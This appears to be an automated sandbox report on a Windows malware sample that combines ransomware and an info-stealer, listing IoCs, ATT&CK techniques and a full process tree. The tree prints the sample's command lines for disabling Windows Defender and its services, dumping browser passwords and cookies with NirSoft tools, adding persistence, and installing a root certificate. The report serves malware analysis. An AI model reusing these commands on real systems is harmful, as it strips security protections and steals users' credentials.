686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883

Analysis

max time kernel
4294115s
max time network
121s
platform
windows7_x64
resource
win7-20220223-en
submitted
10-03-2022 03:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe
Size

3.0MB
MD5

aba555a7e54895aa652cdf73e4a9c1a5
SHA1

30c3572cbbeb81815f73b425d410ce9d1c5e9b3c
SHA256

686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883
SHA512

f7fcee3972532a605554ce15614371b79c3a7870dc8e809593a46a9e51e817795f7f1b386c08731a346c04bdf01d1f8715290539aabf806eae24c5d3332d526a

Score

10^/10

evasion persistence ransomware spyware stealer trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1152-63-0x000000001B400000-0x000000001B742000-memory.dmp	WebBrowserPassView
behavioral1/files/0x00060000000143a6-91.dat	WebBrowserPassView
behavioral1/files/0x00060000000143a6-92.dat	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/1152-63-0x000000001B400000-0x000000001B742000-memory.dmp	Nirsoft
behavioral1/files/0x0006000000014242-85.dat	Nirsoft
behavioral1/files/0x0006000000014242-84.dat	Nirsoft
behavioral1/files/0x00060000000143a6-91.dat	Nirsoft
behavioral1/files/0x00060000000143a6-92.dat	Nirsoft
behavioral1/files/0x00060000000142d2-105.dat	Nirsoft
behavioral1/files/0x00060000000142d2-100.dat	Nirsoft
behavioral1/files/0x0006000000014350-112.dat	Nirsoft
behavioral1/files/0x0006000000014350-113.dat	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
1152	RtkBtManServ.exe
1620	CustomEXE.exe
1408	bfsvc.exe
968	snuvcdsm.exe
1552	winhlp32.exe
1596	splwow64.exe
1588	hh.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\BackupUse.tiff.givemenitro	CustomEXE.exe
File opened for modification	C:\Users\Admin\Pictures\BackupUse.tiff	CustomEXE.exe
File created	C:\Users\Admin\Pictures\ConvertToUndo.tif.givemenitro	CustomEXE.exe
File created	C:\Users\Admin\Pictures\MoveRestart.png.givemenitro	CustomEXE.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000142c8-101.dat	upx
behavioral1/files/0x00060000000142db-103.dat	upx
behavioral1/files/0x00060000000142c8-98.dat	upx
behavioral1/files/0x00060000000142db-99.dat	upx

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2581094.exe	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2581094.exe	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe

Loads dropped DLL 2 IoCs

pid	Process
1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe
1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\NR = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CustomEXE.exe\""	CustomEXE.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	CustomEXE.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	CustomEXE.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	CustomEXE.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	api64.ipify.org
9	api.ipify.org
10	api.ipify.org
13	api64.ipify.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	RtkBtManServ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RtkBtManServ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RtkBtManServ.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 5 IoCs

pid	Process
1408	bfsvc.exe
968	snuvcdsm.exe
1552	winhlp32.exe
1596	splwow64.exe
1588	hh.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1620	CustomEXE.exe
1620	CustomEXE.exe
968	snuvcdsm.exe
1588	hh.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe
Token: SeDebugPrivilege	1152	RtkBtManServ.exe
Token: SeDebugPrivilege	1620	CustomEXE.exe
Token: SeIncreaseQuotaPrivilege	1968	WMIC.exe
Token: SeSecurityPrivilege	1968	WMIC.exe
Token: SeTakeOwnershipPrivilege	1968	WMIC.exe
Token: SeLoadDriverPrivilege	1968	WMIC.exe
Token: SeSystemProfilePrivilege	1968	WMIC.exe
Token: SeSystemtimePrivilege	1968	WMIC.exe
Token: SeProfSingleProcessPrivilege	1968	WMIC.exe
Token: SeIncBasePriorityPrivilege	1968	WMIC.exe
Token: SeCreatePagefilePrivilege	1968	WMIC.exe
Token: SeBackupPrivilege	1968	WMIC.exe
Token: SeRestorePrivilege	1968	WMIC.exe
Token: SeShutdownPrivilege	1968	WMIC.exe
Token: SeDebugPrivilege	1968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1968	WMIC.exe
Token: SeRemoteShutdownPrivilege	1968	WMIC.exe
Token: SeUndockPrivilege	1968	WMIC.exe
Token: SeManageVolumePrivilege	1968	WMIC.exe
Token: 33	1968	WMIC.exe
Token: 34	1968	WMIC.exe
Token: 35	1968	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1968	WMIC.exe
Token: SeSecurityPrivilege	1968	WMIC.exe
Token: SeTakeOwnershipPrivilege	1968	WMIC.exe
Token: SeLoadDriverPrivilege	1968	WMIC.exe
Token: SeSystemProfilePrivilege	1968	WMIC.exe
Token: SeSystemtimePrivilege	1968	WMIC.exe
Token: SeProfSingleProcessPrivilege	1968	WMIC.exe
Token: SeIncBasePriorityPrivilege	1968	WMIC.exe
Token: SeCreatePagefilePrivilege	1968	WMIC.exe
Token: SeBackupPrivilege	1968	WMIC.exe
Token: SeRestorePrivilege	1968	WMIC.exe
Token: SeShutdownPrivilege	1968	WMIC.exe
Token: SeDebugPrivilege	1968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1968	WMIC.exe
Token: SeRemoteShutdownPrivilege	1968	WMIC.exe
Token: SeUndockPrivilege	1968	WMIC.exe
Token: SeManageVolumePrivilege	1968	WMIC.exe
Token: 33	1968	WMIC.exe
Token: 34	1968	WMIC.exe
Token: 35	1968	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 1152	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	28
PID 1792 wrote to memory of 1152	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	28
PID 1792 wrote to memory of 1152	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	28
PID 1792 wrote to memory of 1152	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	28
PID 1792 wrote to memory of 1620	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	29
PID 1792 wrote to memory of 1620	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	29
PID 1792 wrote to memory of 1620	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	29
PID 1792 wrote to memory of 1620	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	29
PID 1620 wrote to memory of 976	1620	CustomEXE.exe	30
PID 1620 wrote to memory of 976	1620	CustomEXE.exe	30
PID 1620 wrote to memory of 976	1620	CustomEXE.exe	30
PID 1620 wrote to memory of 976	1620	CustomEXE.exe	30
PID 976 wrote to memory of 1968	976	cmd.exe	32
PID 976 wrote to memory of 1968	976	cmd.exe	32
PID 976 wrote to memory of 1968	976	cmd.exe	32
PID 976 wrote to memory of 1968	976	cmd.exe	32
PID 1792 wrote to memory of 1768	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	33
PID 1792 wrote to memory of 1768	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	33
PID 1792 wrote to memory of 1768	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	33
PID 1792 wrote to memory of 1768	1792	686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe	33
PID 1768 wrote to memory of 1520	1768	cmd.exe	35
PID 1768 wrote to memory of 1520	1768	cmd.exe	35
PID 1768 wrote to memory of 1520	1768	cmd.exe	35
PID 1768 wrote to memory of 1520	1768	cmd.exe	35
PID 1768 wrote to memory of 484	1768	cmd.exe	36
PID 1768 wrote to memory of 484	1768	cmd.exe	36
PID 1768 wrote to memory of 484	1768	cmd.exe	36
PID 1768 wrote to memory of 484	1768	cmd.exe	36
PID 1768 wrote to memory of 2008	1768	cmd.exe	37
PID 1768 wrote to memory of 2008	1768	cmd.exe	37
PID 1768 wrote to memory of 2008	1768	cmd.exe	37
PID 1768 wrote to memory of 2008	1768	cmd.exe	37
PID 1768 wrote to memory of 1716	1768	cmd.exe	38
PID 1768 wrote to memory of 1716	1768	cmd.exe	38
PID 1768 wrote to memory of 1716	1768	cmd.exe	38
PID 1768 wrote to memory of 1716	1768	cmd.exe	38
PID 1768 wrote to memory of 1260	1768	cmd.exe	39
PID 1768 wrote to memory of 1260	1768	cmd.exe	39
PID 1768 wrote to memory of 1260	1768	cmd.exe	39
PID 1768 wrote to memory of 1260	1768	cmd.exe	39
PID 1768 wrote to memory of 672	1768	cmd.exe	40
PID 1768 wrote to memory of 672	1768	cmd.exe	40
PID 1768 wrote to memory of 672	1768	cmd.exe	40
PID 1768 wrote to memory of 672	1768	cmd.exe	40
PID 1768 wrote to memory of 860	1768	cmd.exe	41
PID 1768 wrote to memory of 860	1768	cmd.exe	41
PID 1768 wrote to memory of 860	1768	cmd.exe	41
PID 1768 wrote to memory of 860	1768	cmd.exe	41
PID 1768 wrote to memory of 1376	1768	cmd.exe	42
PID 1768 wrote to memory of 1376	1768	cmd.exe	42
PID 1768 wrote to memory of 1376	1768	cmd.exe	42
PID 1768 wrote to memory of 1376	1768	cmd.exe	42
PID 1768 wrote to memory of 1992	1768	cmd.exe	43
PID 1768 wrote to memory of 1992	1768	cmd.exe	43
PID 1768 wrote to memory of 1992	1768	cmd.exe	43
PID 1768 wrote to memory of 1992	1768	cmd.exe	43
PID 1768 wrote to memory of 1380	1768	cmd.exe	44
PID 1768 wrote to memory of 1380	1768	cmd.exe	44
PID 1768 wrote to memory of 1380	1768	cmd.exe	44
PID 1768 wrote to memory of 1380	1768	cmd.exe	44
PID 1768 wrote to memory of 1104	1768	cmd.exe	45
PID 1768 wrote to memory of 1104	1768	cmd.exe	45
PID 1768 wrote to memory of 1104	1768	cmd.exe	45
PID 1768 wrote to memory of 1104	1768	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe
"C:\Users\Admin\AppData\Local\Temp\686b8f21c35d25b40be1b589c4ae9687d5bdcd5c5c9394fe4f456ca800edc883.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
  "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4/b4fIPsTsawldpJx/PyBhc3bcAjLFcy5VAlNzwvozHJIsPz8pK/aIjnk66TPxGDAthP8nkL7LkMSDIIlKtLBGi7EjBhuXcDHW4WWF/vBEE7vdhxWvUF2Ef4ME18lFtBg=
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  PID:1152
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
    3⤵
    PID:1380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c compile.bat
      4⤵
      PID:1196
    - - C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
        
        C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1408
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
    3⤵
    PID:1220
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c compile.bat
      4⤵
      PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: EnumeratesProcesses
        
        PID:968
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
    3⤵
    PID:2012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c compile.bat
      4⤵
      PID:1964
    - - C:\Users\Admin\AppData\Local\Temp\hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: EnumeratesProcesses
        
        PID:1588
    - - C:\Users\Admin\AppData\Local\Temp\splwow64.exe
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1596
    - - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1552
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
    3⤵
    PID:484
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c compile.bat
      4⤵
      PID:1544
    - - C:\Users\Admin\AppData\Local\Temp\xwizard.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
        5⤵
        
        PID:2024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
    3⤵
    PID:1320
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:572
- C:\Users\Admin\AppData\Local\Temp\CustomEXE.exe
  "C:\Users\Admin\AppData\Local\Temp\CustomEXE.exe"
  2⤵
  - Executes dropped EXE
  - Modifies extensions of user files
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1968
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:852
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:972
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

